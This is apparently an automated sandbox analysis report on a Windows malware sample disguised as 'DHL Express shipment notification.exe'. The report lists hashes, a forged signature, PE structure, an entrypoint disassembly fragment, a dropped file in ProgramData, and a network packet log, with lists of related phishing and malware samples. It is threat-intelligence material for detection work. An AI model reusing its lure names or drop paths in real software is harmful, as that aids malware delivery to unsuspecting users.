	html.html	Get hash	malicious	Browse	152.199.23.37
	#Ud83d#Udce9-susan.hinds6459831.htm	Get hash	malicious	Browse	152.199.23.37
	phish.htm	Get hash	malicious	Browse	152.199.21.175
	ph.htm	Get hash	malicious	Browse	152.199.21.175
	forensic_challenge(1).html	Get hash	malicious	Browse	93.184.220.70
	Download_Statement_(0 seconds).htm	Get hash	malicious	Browse	152.199.23.37
	Download_Statement_.htm	Get hash	malicious	Browse	152.199.23.37
	Statement.html	Get hash	malicious	Browse	152.199.23.37
	PO 4500151298 SIAM RRJ 38 2.exe	Get hash	malicious	Browse	93.184.216.34
	Pay App #8- Change Order.html	Get hash	malicious	Browse	192.229.221.185
	Fax059-j.metternich-SwiftMT109-INV.html	Get hash	malicious	Browse	152.199.23.37
	Fax059-j.metternich-SwiftMT109-INV.html	Get hash	malicious	Browse	152.199.23.37
	WMHighfield.html	Get hash	malicious	Browse	152.199.21.175
	Statement.html	Get hash	malicious	Browse	152.199.23.37
	Michal November 23, 2021.html	Get hash	malicious	Browse	152.199.23.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Transferencia_29_11_2021 17.03.39.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	part-1500645108.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	gXphSPTf52.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	VM845.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	Rl3M5OSf6P.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	#U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbs	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	DOC209272621615.PDF.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-40567503.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	ATT14851.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	AtlanticareINV25-67431254.htm	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	WMHighfield.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	5WJw8YWsvu.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	FACTURAS.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	RFQ 001030112021#U00b7pdf.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-107262298.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	products samples pdf.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	item-1202816963.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	draft_inv dec21.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	Nh3xqMPynb.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	#Encoder_n1.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161

Dropped Files

No context

Created / dropped Files

C:\ProgramData\images.exe Download File
Process:	C:\Users\user\Desktop\DHL Express shipment notification.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	152728
Entropy (8bit):	5.288330717800927
Encrypted:	false
SSDEEP:	1536:bSyEql7Tg8Xxo5HCSJndCcIVdPsw4Jaev0Cq5pg:WyEql7Tg6hhTdkHwphg
MD5:	26E034A56F86ED41CB3E869095EC73B7
SHA1:	A74551CE377AADBAAE0B31B54B2536DAAA832754
SHA-256:	60AB75A94E04AA5DFAB1A68DA060A817E9F5CCB79F8A93D0C3DBFE47CB526B7D
SHA-512:	283EB6C75E024FAC46085EA526B96844466B6B27861DBE047D37D3BDE1D59E207241426B812030E8CB22D45441D6F4BDFD5C6D841B39EB21C9AC01BD7B0B346D
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 25%, Browse Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L...\|a.T.....................0............... ....@..........................P.......{..........................................(....@..X............@......................................................(... .......4............................text............................... ..`.data...,.... ....... ..............@....rsrc...X....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\images.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\DHL Express shipment notification.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.288330717800927
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL Express shipment notification.exe
File size:	152728
MD5:	26e034a56f86ed41cb3e869095ec73b7
SHA1:	a74551ce377aadbaae0b31b54b2536daaa832754
SHA256:	60ab75a94e04aa5dfab1a68da060a817e9f5ccb79f8a93d0c3dbfe47cb526b7d
SHA512:	283eb6c75e024fac46085ea526b96844466b6b27861dbe047d37d3bde1d59e207241426b812030e8cb22d45441d6f4bdfd5c6d841b39eb21c9ac01bd7b0b346d
SSDEEP:	1536:bSyEql7Tg8Xxo5HCSJndCcIVdPsw4Jaev0Cq5pg:WyEql7Tg6hhTdkHwphg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...\|a.T.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54B7617C [Thu Jan 15 06:43:08 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	01/12/2021 12:31:58 01/12/2022 12:31:58
Subject Chain	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Version:	3
Thumbprint MD5:	6E23C2E0F1EAA5736459B248CD4F244F
Thumbprint SHA-1:	3EF79B4748A2F5E9C61B979020E0070FCAB22AF2
Thumbprint SHA-256:	1252758943828E279B0955645D9BFE6EBC24BAB29368FB5EFDC213D5B615F3A0
Serial:	00

Entrypoint Preview

Instruction
push 004019C8h
call 00007FCA889D0A05h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+6C9B95C0h], dl
jle 00007FCA889D09C5h
dec eax
movsb
xor esp, ebp
add al, 17h
xchg dword ptr [ebx], eax
xchg dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+6Fh], dl
jnc 00007FCA889D0A85h
jnc 00007FCA889D0A86h
imul ebp, dword ptr [edi+6Eh], 00000073h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [ebp+27D3B3C4h], bh
sahf
inc eax
xchg dword ptr [ebp-3053F3DEh], ebp
das
cmp ch, byte ptr [ebx+29A901E3h]
jo 00007FCA889D09DEh
inc edi
xchg eax, edx
js 00007FCA889D0A13h
fsub dword ptr [ecx+3A5A13C6h]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esi
add byte ptr [eax], al
add byte ptr [ecx+00h], dl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [ebx+70h], dh
popad
je 00007FCA889D0A7Ah
popad
insb
add byte ptr [4A000F01h], cl
outsd
bound ebp, dword ptr [ebp+75h]
insb
imul esp, dword ptr [edi+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x218b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x958	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1498
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20fa4	0x21000	False	0.377485795455	data	5.3781600227	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x958	0x1000	False	0.173828125	data	2.03797872425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24828	0x130	data
RT_ICON	0x24540	0x2e8	data
RT_ICON	0x24418	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x243e8	0x30	data
RT_VERSION	0x24150	0x298	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	Slesk8
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	Slesk8.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-19:26:28.787414	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:25:24.739118099 CET	80	49674	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:24.739348888 CET	49674	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:31.745023012 CET	80	49689	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:31.745553970 CET	49689	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:33.942204952 CET	80	49694	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:33.942389965 CET	49694	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:37.544254065 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.544349909 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.544497967 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.566915989 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.566970110 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.618716002 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.618901014 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.620765924 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.620925903 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.759744883 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.759810925 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.760510921 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:37.760644913 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.764530897 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:37.807816982 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264718056 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264893055 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.264919043 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.264981985 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.265098095 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.265301943 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.315473080 CET	49740	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:25:38.315534115 CET	443	49740	142.250.185.206	192.168.11.20
Dec 1, 2021 19:25:38.403029919 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403107882 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.403270960 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403641939 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.403700113 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.455162048 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.455315113 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.455543995 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.457258940 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.457540989 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.462654114 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.462713957 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.463036060 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.463254929 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.467459917 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.507890940 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.765798092 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.765993118 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766041040 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766331911 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.766577005 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.766937971 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.767194986 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.768460035 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.768719912 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.768778086 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.768996954 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.769073009 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.769393921 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.769449949 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.769726992 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776184082 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776380062 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776395082 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776428938 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776664972 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776700974 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.776726007 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.776981115 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.777247906 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.777494907 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.777543068 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.777828932 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778067112 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.778305054 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778352022 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.778595924 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.778821945 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779042006 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779095888 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779293060 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779491901 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.779721022 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.779761076 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780180931 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780324936 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780533075 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780569077 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.780764103 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.780808926 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781013012 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781042099 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781331062 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781672001 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.781819105 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.781853914 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782047033 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.782329082 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782526970 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782603979 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.782644033 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.782759905 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.782773018 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.783404112 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.783592939 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.783757925 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.783822060 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.783834934 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.784131050 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.784332037 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.784517050 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.784769058 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.784821987 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.784832954 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.785119057 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.785387993 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.785579920 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.785593033 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.785621881 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.785767078 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.787071943 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787285089 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787312984 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.787343025 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787487984 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.787503958 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.787518024 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787538052 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787695885 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.787952900 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788007975 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.788017988 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788232088 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788268089 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.788439035 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.788463116 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788485050 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.788733006 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788774014 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.788799047 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.789043903 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.789174080 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.789350986 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.789377928 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.789401054 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.789645910 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.789686918 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.789711952 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.789953947 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.789988995 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.790183067 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.790210962 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.790229082 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.790575981 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.790638924 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.790847063 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.790914059 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.791088104 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.791204929 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.791472912 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.791523933 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.791536093 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.791798115 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.791858912 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.792054892 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.792152882 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.792295933 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.792346954 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.792360067 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.792460918 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.792603970 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.792726040 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.792884111 CET	49741	443	192.168.11.20	216.58.212.161
